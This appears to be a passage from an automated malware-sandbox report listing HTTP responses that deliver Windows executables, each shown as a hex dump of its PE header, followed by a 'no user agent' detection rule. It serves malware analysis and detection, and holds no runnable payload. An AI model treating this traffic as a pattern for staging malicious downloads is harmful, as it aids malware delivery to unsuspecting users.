00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:32:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:32:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:32:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:32:05 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:32:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jun 2024 20:32:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 28 Jun 2024 20:32:12 GMTContent-Type: application/octet-streamContent-Length: 1899520Last-Modified: Fri, 28 Jun 2024 19:26:33 GMTConnection: keep-aliveETag: "667f0e69-1cfc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 90 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4b 00 00 04 00 00 f3 98 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 6f 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 6e 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 74 70 71 6e 62 74 76 00 f0 19 00 00 90 31 00 00 e2 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 74 6c 73 77 62 79 74 00 10 00 00 00 80 4b 00 00 06 00 00 00 d4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4b 00 00 22 00 00 00 da 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
